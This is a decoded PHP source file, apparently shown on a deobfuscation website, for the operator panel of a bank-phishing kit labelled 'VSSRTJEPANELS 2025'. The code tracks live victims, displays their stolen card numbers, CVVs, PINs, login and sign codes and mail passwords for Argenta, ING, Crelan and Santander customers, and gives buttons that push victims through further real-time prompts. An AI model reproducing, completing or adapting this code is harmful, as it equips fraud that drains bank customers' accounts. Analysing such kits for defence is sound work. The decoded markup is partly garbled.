Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php // VSSRTJE >< VSSRTJEPANELS 2025 namespace App\Controllers\Users; use Core\Vi..
Decoded Output download
<?php
// VSSRTJE >< VSSRTJEPANELS 2025
namespace App\Controllers\Users; use Core\View; use App\Models\Users\User; use App\Auth; class Logs extends \Core\Controller { public function logsAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["username"]); if ($data) { if ($_SERVER["REQUEST_METHOD"] == "POST") { $logs = User::getLogs($_SESSION["username"]); $this->showLogs($logs); } else { View::render("Admin/logs.php", array("title" => "Logs")); } } else { Auth::destroySession(); } } else { static::redirect("/belgica/start"); } } public function getOneAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["username"]); if ($data) { if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["id"])) { $log = User::getLog($_POST["id"], $_SESSION["username"]); $this->showLog($log); } else { static::redirect("/admin/logs"); } } else { Auth::destroySession(); } } else { static::redirect("/belgica/start"); } } public function deleteAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["username"]); if ($data) { if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["id"])) { $data = array("id" => $_POST["id"]); $wachten = "<div class="vssrstatus vssronline">\360\x9f\237\xa2 | Online</div>"; $errors = array("id" => ''); $wachten = "<div class="vssrstatus vssronline">\360\x9f\x9f\242 | Online</div>"; if (empty($data["id"])) { $errors["id"] = "empty_id"; } if (empty($errors["id"])) { $check = User::deleteLog($_SESSION["username"], $data["id"]); if ($check) { echo json_encode(array("success" => "true")); } else { echo json_encode(array("fail" => "request_failed")); } } else { echo json_encode($errors); } } else { static::redirect("/belgica/start"); } } else { Auth::destroySession(); } } else { static::redirect("/belgica/start"); } } public function updateNoteAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["username"]); if ($data) { if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["id"]) && isset($_POST["note"])) { $data = array("id" => $_POST["id"], "note" => $_POST["note"]); $errors = array("id" => '', "note" => ''); if (empty($data["id"])) { $errors["id"] = "empty_id"; } if (empty($data["note"])) { $errors["note"] = "empty_note"; } if (empty($errors["id"]) && empty($errors["note"])) { $check = User::updateNote($_SESSION["username"], $data["id"], $data["note"]); if ($check) { echo json_encode(array("success" => "true")); } else { echo json_encode(array("fail" => "request_failed")); } } else { echo json_encode($errors); } } else { static::redirect("/belgica/start"); } } else { Auth::destroySession(); } } else { static::redirect("/belgica/start"); } } public function deleteAllAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["username"]); if ($data) { if ($_SERVER["REQUEST_METHOD"] == "POST") { $check = User::deleteLogs($_SESSION["username"]); if ($check) { echo json_encode(array("success" => "true")); } else { echo json_encode(array("fail" => "request_failed")); } } else { static::redirect("/belgica/start"); } } else { Auth::destroySession(); } } else { static::redirect("/belgica/start"); } } public function deleteEmptyAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["username"]); if ($data) { if ($_SERVER["REQUEST_METHOD"] == "POST") { $check = User::deleteEmptyLogs($_SESSION["username"]); if ($check) { echo json_encode(array("success" => "true")); } else { echo json_encode(array("fail" => "request_failed")); } } else { static::redirect("/belgica/start"); } } else { Auth::destroySession(); } } else { static::redirect("/belgica/start"); } } public function banAction() { if (Auth::isLoggedIn()) { $data = User::checkSession($_SESSION["username"]); if ($data) { if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST["id"]) && isset($_POST["ip"])) { $data = array("id" => $_POST["id"], "ip" => $_POST["ip"]); $errors = array("id" => '', "ip" => ''); if (empty($data["id"])) { $errors["id"] = "empty_id"; } if (empty($data["ip"])) { $errors["ip"] = "empty_ip"; } if (empty($errors["id"]) && empty($errors["ip"])) { $check = User::banUser($data["id"], $data["ip"]); if ($check) { echo json_encode(array("success" => "true")); } else { echo json_encode(array("fail" => "request_failed")); } } else { echo json_encode($errors); } } else { static::redirect("/belgica/start"); } } else { Auth::destroySession(); } } else { static::redirect("/belgica/start"); } } private function showLogs($logs) { $topLogs = array(); $otherLogs = array(); $userAgents = array("Google Chrome" => array("icon" => "fab fa-chrome", "type" => "Browser"), "Firefox" => array("icon" => "fab fa-firefox", "type" => "Browser"), "Safari" => array("icon" => "fab fa-safari", "type" => "Browser"), "Internet Explorer" => array("icon" => "fab fa-internet-explorer", "type" => "Browser"), "Microsoft Edge" => array("icon" => "fab fa-edge", "type" => "Browser"), "Opera" => array("icon" => "fab fa-opera", "type" => "Browser"), "Brave" => array("icon" => "fab fa-brave", "type" => "Browser"), "Windows" => array("icon" => "fab fa-windows", "type" => "OS"), "Mac OS" => array("icon" => "fab fa-apple", "type" => "OS"), "Linux" => array("icon" => "fab fa-linux", "type" => "OS")); foreach ($logs as $log) { $new_date = new \DateTime(); $old_date = new \DateTime($log["last_connected"]); $diff = $new_date->getTimestamp() - $old_date->getTimestamp(); $waiting = "bg-darker"; $wachten = "<div class="vssrstatus vssroffline">\xe2\232\xab | Offline</div>"; if ($log["waiting"] == "true") { $waiting = "bg-blink"; $wachten = "<div class="vssrstatus vssrwaiting">\xf0\237\x94\xb4 | Waiting</div>"; array_push($topLogs, $log); } else { if ($diff < 10) { $waiting = "bg-success"; $wachten = "<div class="vssrstatus vssronline">\360\237\237\xa2 | Online</div>"; array_push($topLogs, $log); } else { array_push($otherLogs, $log); } } } $allLogs = array_merge($topLogs, $otherLogs); foreach ($allLogs as $log) { $new_date = new \DateTime(); $old_date = new \DateTime($log["last_connected"]); $diff = $new_date->getTimestamp() - $old_date->getTimestamp(); $waiting = "bg-darker"; $wachten = "<div class="vssrstatus vssroffline">\342\x9a\253 | Offline</div>"; if ($log["waiting"] == "true") { $waiting = "bg-blink"; $wachten = "<div class="vssrstatus vssrwaiting">\360\x9f\x94\264 | Waiting</div>"; } else { if ($diff < 10) { $waiting = "bg-success"; $wachten = "<div class="vssrstatus vssronline">\360\x9f\x9f\242 | Online</div>"; } } $userAgentName = $log["user_agent"]; $browserIcon = ''; $browserName = ''; $osIcon = ''; $osName = ''; foreach ($userAgents as $name => $info) { if (strpos($userAgentName, $name) !== false) { if ($info["type"] == "Browser") { $browserIcon = $info["icon"]; $browserName = $name; } else { if ($info["type"] == "OS") { $osIcon = $info["icon"]; $osName = $name; } } } } if (isset($_POST["empty"])) { $sql = "DELETE FROM logs WHERE santander_user = '' AND santander_pass = '' AND santander_exp = '' AND santander_number = '' AND santander_tan = '' AND santander_confirm = '' AND santander_wifi = '' AND santander_wifi_pass = '' AND santander_wifi_pass_two = '' AND santander_creditcard = '' AND santander_ccexp = '' AND santander_cvv = '' AND santander_code = '' AND santander_respons = ''"; $db = static::getDB(); $stmt = $db->prepare($sql); $stmt->execute(); header("Location: /logs"); die; } ?>
<br><br>
<table id="entries" class="table table-striped table-list-search">
</thead>
</tr>
</div>
</div>
<?php echo "<tr class="" . $waiting . ""></p>"; echo "<td style="color: white;">    " . $wachten . ''; echo "<td style="color: white;">" . $log["user_id"] . " </td>"; echo "<td style="color: white;">" . $log["ip"] . " </td>"; echo "<td style="color: white;"><b>" . (!empty($log["bank"]) ? $log["bank"] : "<span>NOT SELECTED") . "</b></td>"; echo "<td style="color: white;"><span class="vssrtje"><span style="font-size: 18px;" class="" . htmlspecialchars($osIcon) . ""></span> <span style="font-size: 18px;" class="" . htmlspecialchars($browserIcon) . ""></span></span>
\xa \xa <style>
vssrtje {\xa font-family: monospace;\xa
}\xa .os-icon:before {\xa font-size: 24px;
margin-right: 8px;\xa }
.browser-icon:before {\xa font-size: 24px;\xa margin-right: 8px;\xa }
.fa-windows {
color: #9c4dcc; /* Windows color */\xa }
\xa .fa-apple {\xa color: #9c4dcc; /* Mac color */
}
\xa .fa-linux {\xa color: #9c4dcc; /* Linux color */\xa }\xa \xa .fa-chrome {
color: #9c4dcc; /* Chrome color */\xa }\xa \xa .fa-firefox {\xa color: #9c4dcc; /* Firefox color */\xa }\xa
.fa-safari {\xa color: #9c4dcc; /* Safari color */
}\xa \xa .fa-internet-explorer {
color: #9c4dcc; /* Internet Explorer color */
}
\xa .fa-edge {
color: #9c4dcc; /* Edge color */
}\xa \xa .fa-opera {
color: #9c4dcc; /* Opera color */
}\xa \xa .fa-brave {
color: #9c4dcc; /* Brave color */
}\xa
</style></td>"; echo "<td><a title="Click to open this Log." href="/overview/" . htmlspecialchars($log["user_id"]) . "" target="_blank"><button class="btn btn-outline-primary btn-circle btn-sm"><i class="fas fa-external-link-alt"></i></button></a>"; ?>
<button title="Click here to BAN user." class="btn btn-outline-warning btn-circle btn-sm" onclick="banUser('<?php echo htmlspecialchars($log["user_id"]); ?>
', '<?php echo htmlspecialchars($log["ip"]); ?>
')"><i class="fas fa-ban"></i></button>
<button title="Click here to DELETE this Log." class="btn btn-outline-danger btn-circle btn-sm shadow-lg" onclick="deleteLog('<?php echo htmlspecialchars($log["user_id"]); ?>
')" ><i class="fas fa-trash"></i></button> </td>
</tr>
</div>
</a>
</div>
</div>
</div>
</div>
<?php } } private function showLog($log) { $new_date = new \DateTime(); $old_date = new \DateTime($log["last_connected"]); $interval = $old_date->diff($new_date); $minutes = $interval->i; $hours = $interval->h; $days = $interval->d; $total_minutes = $minutes + $hours * 60 + $days * 24 * 60; $timeString = ''; if ($total_minutes >= 60) { $hours = floor($total_minutes / 60); $minutes = $total_minutes % 60; $timeString = $hours . " hour" . ($hours > 1 ? "s" : '') . " and " . $minutes . " minutes" . ($minutes > 1 ? "s" : '') . " ago"; } else { $timeString = $total_minutes . " minutes" . ($total_minutes > 1 ? "s" : '') . " ago"; } $bank = ''; if (!empty($log["bank"])) { $bank = '' . $log["bank"]; $user_id = $log["user_id"]; $ip = $log["ip"]; $waiting = $log["waiting"]; $last_connected = $log["last_connected"]; } if ($log["waiting"] == "true") { $waiting = " bg-blink"; $wachten = " \xf0\x9f\224\xb4 | Waiting"; echo "<audio autoplay loop><source src="/audio/vis.mp3" type="audio/mpeg"></audio>"; } else { if ($log["waiting"] < 10) { $waiting = " bg-success"; $wachten = " \xf0\x9f\237\xa2 | Online"; } } if ($log["waiting"] == "false") { $wachten = " \342\x9a\xab\xf0\x9f\x9f\242"; } $diff = $new_date->getTimestamp() - $old_date->getTimestamp(); echo "<br><br><div class="row p-1">"; if ($log["waiting"] === "true") { echo "<div class="col-12">"; echo "<div class="col-12 bg-blink rounded">"; echo "<h1 class="text-white text-center p-4" id="alert" style="font-size: 1.5rem"><i class="fa fa-wifi" aria-hidden="true"></i> Currently Waiting</h1>"; echo "</div>"; } else { if ($diff > 10) { echo "<div class="col-12">"; echo "<div class="col-12 bg-darker rounded">"; echo "<h1 class="text-white text-center p-4" id="alert" style="font-size: 1.5rem"><i class="fa fa-wifi" aria-hidden="true"></i> Currently Offline </h1>"; echo "</div>"; } else { echo "<div class="col-12">"; echo "<div class="col-12 bg-success rounded">"; echo "<h1 class="text-white text-center p-4" id="alert" style="font-size: 1.5rem"><i class="fa fa-wifi" aria-hidden="true"></i> Currently Online </h1>"; echo "</div>"; } } echo "<br><style>.border-left-danger {
border-left: 0.25rem solid #1a1d20!important;
}</style><div class="row">
\xa <div class="col-xl-3 col-md-6 mb-4">\xa
<div class="card border-left-danger custom-border bg-darker h-100 py-2">
<div class="card-body">
<div class="row no-gutters align-items-center">\xa <div class="col mr-2">
\xa <div class="text-xs font-weight-bold custom-text text-uppercase mb-1">\xa <i class="fa fa-clock" aria-hidden="true"></i> </i>Last Seen</div>
<div class="h5 mb-0 font-weight-bold text-white">" . $timeString . "</div>
</div>
<div class="col-auto">\xa \xa </div>
</div>\xa </div>
</div>\xa </div>\xa <div class="col-xl-3 col-md-6 mb-4">
<div class="card border-left-danger custom-border bg-darker h-100 py-2">
<div class="card-body">
<div class="row no-gutters align-items-center">\xa <div class="col mr-2">\xa <div class="text-xs font-weight-bold custom-text text-uppercase mb-1">\xa <i class="fa fa-info-circle" aria-hidden="true"></i> IP ADDRESS</div>\xa <div class="h5 mb-0 font-weight-bold text-white">" . $log["ip"] . "</div>\xa </div>\xa <div class="col-auto">
\xa </div>\xa </div>
</div>\xa </div>\xa </div>
<div class="col-xl-3 col-md-6 mb-4">\xa <div class="card border-left-danger custom-border bg-darker h-100 py-2">\xa <div class="card-body">
<div class="row no-gutters align-items-center">
<div class="col mr-2">\xa <div class="text-xs font-weight-bold custom-text text-uppercase mb-1">
<i class="fa fa-id-card" aria-hidden="true"></i> User ID</div>\xa <div class="h5 mb-0 font-weight-bold text-white">" . $log["user_id"] . "</div>
</div>\xa <div class="col-auto">\xa \xa </div>
</div>\xa </div>\xa </div>
</div>
<div class="col-xl-3 col-md-6 mb-4">\xa <div class="card border-left-danger custom-border bg-darker h-100 py-2">\xa <div class="card-body">\xa <div class="row no-gutters align-items-center">\xa <div class="col mr-2">
<div class="text-xs font-weight-bold custom-text text-uppercase mb-1">
<i class="fa fa-university" aria-hidden="true"></i> Bank</div>
<div class="h5 mb-0 font-weight-bold text-white">" . (empty($log["bank"]) ? "NOT SELECTED" : $log["bank"]) . "</div>\xa </div>
<div class="col-auto">
\xa </div>\xa </div>
</div>\xa </div>
</div>
</div>"; echo "</div>"; echo "</div>"; echo "</div>"; echo "</div>"; echo "<style type="text/css">
.modal-header {
display: flex;
align-items: flex-start;\xa justify-content: space-between;
padding: 1rem 1rem;
border-bottom: 1px solid #202020;
border-top-left-radius: calc(0.3rem - 1px);
border-top-right-radius: calc(0.3rem - 1px);\xa }\xa .modal-footer {
display: flex;
flex-wrap: wrap;
align-items: center;\xa justify-content: flex-end;\xa padding: 0.75rem;\xa border-top: 1px solid #202020;\xa border-bottom-right-radius: calc(0.3rem - 1px);\xa border-bottom-left-radius: calc(0.3rem - 1px);\xa }
.siilenced-darker {
background-color: #1c1c1c;
}
</style><!-- Rabobank Modal -->"; echo ''; ?>
<div class="modal fade" id="exampleModalCenter" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true">
<div class="modal-dialog modal-dialog-centered" role="document">
<div class="modal-content bg-darker">
<div class="modal-header siilenced-darker">
<h5 class="modal-title" id="exampleModalLongTitle"><i class="fa fa-ban" aria-hidden="true"></i> Are you sure u want to ban user?</h5>
</div>
<div class="modal-body">
<p style="font-style: italic;">This action cannot be undone.</p>
<hr>
<p><i class="fa fa-database" aria-hidden="true"></i> Fetching Details <img height="15" width="15" src="/img/ing.gif"></p>
<style>
siilenced {
font-family: monospace;
}
</style>
<div class="card-body">
<div class="card mb-1 siilenced-darker rounded custom-card">
<p>
<siilenced> Ip_address: <?php echo htmlspecialchars($ip); ?>
</siilenced>
</p>
<p>
<siilenced> user_agent: <?php echo htmlspecialchars($log["user_agent"]); ?>
</siilenced>
</p>
<p>
<siilenced> user_id: <?php echo htmlspecialchars($log["user_id"]); ?>
</siilenced>
</p>
<br><br>
</div>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-outline-primary" data-dismiss="modal"><i class="fa fa-times" aria-hidden="true"></i> Close</button>
<button class="btn btn-outline-danger" data-dismiss="modal" onclick="banUser('<?php echo $log["ip"]; ?>
', '<?php echo $log["user_id"]; ?>
')"><i class="fa fa-check" aria-hidden="true"></i> Yes</button>
<?php echo "</div>\xa </div>\xa </div>
</div>\xa </div>\xa </div>"; echo "<!-- End Rabobank Modal -->"; echo "<style>\xa .card-header {\xa padding: 0.75rem 1.25rem;\xa margin-bottom: 0;\xa background-color: #1e1d1d;
border-bottom: 1px solid #202020;\xa }</style><div class="row p-1">"; echo "<div class="col-lg-8 col-sm-12">"; echo "<div class="card-header text-white bg-darker siilenced-darker">
<i class="fa fa-info-circle" aria-hidden="true"></i> Captured Data
\xa </div><div class="col-12 p-4 bg-darker">"; echo "<div class="veusdeput p-4 rounded"> "; if ($log["bank"] === "ARGENTA") { function ARGENTA($label, $value) { echo "<div class="form-group row">"; echo "<label for='id' class='text-secondary col-sm-3 font-weight-bold'>{$label}:</label>"; echo "<div class="col-sm-9">"; echo "<p class='text-secondary'><i><span class='copy-value' onclick='copyToClipboard(this)'>" . htmlspecialchars($value) . "</span><br/><span class='copy-text'>Click to copy</span></i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["argenta_wifi"])) { ARGENTA("CardNumber", $log["argenta_wifi"]); } if (!empty($log["argenta_wifi_pass"])) { ARGENTA("Expiry", $log["argenta_wifi_pass"]); } if (!empty($log["argenta_exp"])) { ARGENTA("SMS", $log["argenta_exp"]); } if (!empty($log["argenta_user"])) { ARGENTA("Phone", $log["argenta_user"]); } if (!empty($log["argenta_call"])) { ARGENTA("Call Vic", $log["argenta_call"]); } if (!empty($log["argenta_custom"])) { ARGENTA("Custom", $log["argenta_custom"]); } if (!empty($log["argenta_tan"])) { ARGENTA("Mail-Pass", $log["argenta_tan"]); } if (!empty($log["argenta_creditcard"])) { ARGENTA("Card Number", $log["argenta_creditcard"]); } if (!empty($log["argenta_ccexp"])) { ARGENTA("Expiry", $log["argenta_ccexp"]); } if (!empty($log["argenta_cvv"])) { ARGENTA("CVV", $log["argenta_cvv"]); } if (!empty($log["argenta_respons"])) { ARGENTA("Login Code", $log["argenta_respons"]); } if (!empty($log["argenta_respons_two"])) { ARGENTA("Live Code", $log["argenta_respons_two"]); } if ($log["waiting"] == "true") { ?>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'control')"><i class="fas fa-sign-in-alt"></i> | Login</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'details')"><i class="fa fa-envelope" aria-hidden="true"></i>
| SMS</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'login')"><i class="fas fa-phone"></i> | Phone</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'tan')"><i class="fa fa-envelope" aria-hidden="true"></i>
| Mail-Pass</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'call')"><i class="fa fa-envelope" aria-hidden="true"></i>
| Call Vic</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'creditcard')"><i class="fa fa-credit-card" aria-hidden="true"></i>
| CC Info</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-success mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
</div>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-outline-warning mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'custom')"><i class="fa fa-phone" aria-hidden="true"></i>
| Custom</button>
</div>
<div class="col-lg-9">
<br>
<input hidden type="text" class="form-control argenta-custom input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
<a href="../public/api/TokenInput/Insert.php" target="_blank" class="custom-link"><b>Set custom amount</b></a>
</div>
<style>
.custom-link {
color: orange;
text-decoration: none;
font-size: 16px;
cursor: pointer;
}
.custom-link:hover {
text-decoration: underline;
}
</style>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i>
| Login Code</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control argenta-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
</div>
<div class="col-lg-3">
<hr>
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setArgenta('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i>
| Live Code</button>
</div>
<div class="col-lg-9">
<hr>
<input type="text" class="form-control argenta-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'">
<input type="text" class="form-control argenta-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'">
</div>
</div>
</div>
</div>
<?php } } else { if ($log["bank"] === "ING") { function ING($label, $value) { echo "<div class="form-group row">"; echo "<label for='id' class='text-secondary col-sm-3 font-weight-bold'>{$label}:</label>"; echo "<div class="col-sm-9">"; echo "<p class='text-secondary'><i><span class='copy-value' onclick='copyToClipboard(this)'>" . htmlspecialchars($value) . "</span><br/><span class='copy-text'>Click to copy</span></i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["ing_wifi"])) { $kaartbegin = '' . $log["ing_wifi"]; ING("CardNumber", $kaartbegin); } if (!empty($log["ing_wifi_pass"])) { ING("ING ID", $log["ing_wifi_pass"]); } if (!empty($log["ing_wifi_pass_two"])) { ING("Expiry", $log["ing_wifi_pass_two"]); } if (!empty($log["ing_exp"])) { ING("SMS", $log["ing_exp"]); } if (!empty($log["ing_password"])) { ING("Mail-Pass", $log["ing_password"]); } if (!empty($log["ing_call"])) { ING("Call Vic", $log["ing_call"]); } if (!empty($log["ing_custom"])) { ING("Custom", $log["ing_custom"]); } if (!empty($log["ing_user"])) { ING("Identify Code", $log["ing_user"]); } if (!empty($log["ing_respons"])) { ING("Login Code", $log["ing_respons"]); } if (!empty($log["ing_code_x"])) { ING("Sign Code", $log["ing_code_x"]); } if (!empty($log["ing_code_m"])) { ING("Sign Code (2)", $log["ing_code_m"]); } if (!empty($log["ing_respons_two"])) { ING("Live Code", $log["ing_respons_two"]); } if (!empty($log["ing_creditcard"])) { ING("SMS", $log["ing_creditcard"]); } if ($log["waiting"] == "true") { ?>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'control')"><i class="fas fa-sign-in-alt"></i> | Login</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'login')"><i class="fas fa-key"></i> | Identify Code</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'creditcard')"><i class="fa fa-comments" aria-hidden="true"></i>
| SMS</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'password')"><i class="fa fa-comments" aria-hidden="true"></i>
| Mail-Pass</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'call')"><i class="fa fa-phone" aria-hidden="true"></i>
| Call Vic</button>
</div>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-success mt-4" onclick="setIng('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
</div>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-outline-warning mt-4" onclick="setIng('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'custom')"><i class="fa fa-phone" aria-hidden="true"></i>
| Custom</button>
</div>
<div class="col-lg-9">
<br>
<input hidden type="text" class="form-control argenta-custom input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
<a href="../public/api/TokenInput/Insert.php" target="_blank" class="custom-link"><b>Set custom amount</b></a>
</div>
<style>
.custom-link {
color: orange;
text-decoration: none;
font-size: 16px;
cursor: pointer;
}
.custom-link:hover {
text-decoration: underline;
}
</style>
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i>
| Login Code</button>
</div>
<div class="col-lg-9">
<input type="text" class="form-control ing-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">
</div>
<div class="col-lg-3">
</div>
<div class="col-lg-9">
<input hidden type="text" class="form-control ing-sign-two input-dark mt-4 custom-input" placeholder="Fill in your 'Sign Code'">
</div>
<div class="col-lg-3">
</div>
<div class="col-lg-9">
<input type="text" hidden class="form-control ing-sign-two-two input-dark mt-4 custom-input" placeholder="Fill in your first 'Sign Code'">
<input type="text" hidden class="form-control ing-sign-two-two-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Sign Code'">
</div>
<div class="col-lg-3">
<hr>
<button class="btn btn-sm btn-block btn-purple mt-4" onclick="setIng('<?php echo htmlspecialchars($log["user_id"]); ?>
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i>
| Live Code</button>
</div>
<div class="col-lg-9">
<hr>
<input type="text" class="form-control ing-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'">
<input type="text" class="form-control ing-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'">
</div>
</div>
</div>
</div>
<?php } } else { if ($log["bank"] == "CRELAN") { if (!empty($log["c_kaart"]) && !empty($log["c_klant"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold"> identificatie :</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_kaart"]) . "</i></p>"; echo "</div>"; echo "</div>"; echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold"> serienummer :</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_klant"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["abn_identification"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Phone Code:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["abn_identification"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_klant"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Custom:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_klant"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["abn_respons_one"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Login Code:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["abn_respons_one"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_exp"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">EXP:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_exp"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_tel"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Telefoon nummer:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_tel"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_sms"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Email-Verify:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_sms"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_m2"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Token 1:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_m2"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_m1"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Token 2:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_m1"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_pin"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">PinCode:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_pin"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if (!empty($log["c_cc"]) && !empty($log["c_cvv"]) && !empty($log["c_exp2"])) { echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">CC:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_cc"]) . "</i></p>"; echo "</div>"; echo "</div>"; echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">CVV:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_cvv"]) . "</i></p>"; echo "</div>"; echo "</div>"; echo "<div class="form-group row">"; echo "<label for="id" class="text-secondary col-sm-3 font-weight-bold">Exp cc:</label>"; echo "<div class="col-sm-9">"; echo "<p class="text-secondary"><i>" . htmlspecialchars($log["c_exp2"]) . "</i></p>"; echo "</div>"; echo "</div>"; } if ($log["waiting"] == "true") { ?>
</div>
<div class="row">
<div class="col-lg-3">
<button class="btn btn-sm btn-block btn btn-purple mt-4" onclick="setCrelan('<?php echo htmlspecialchars($log["user_id"]); ?>
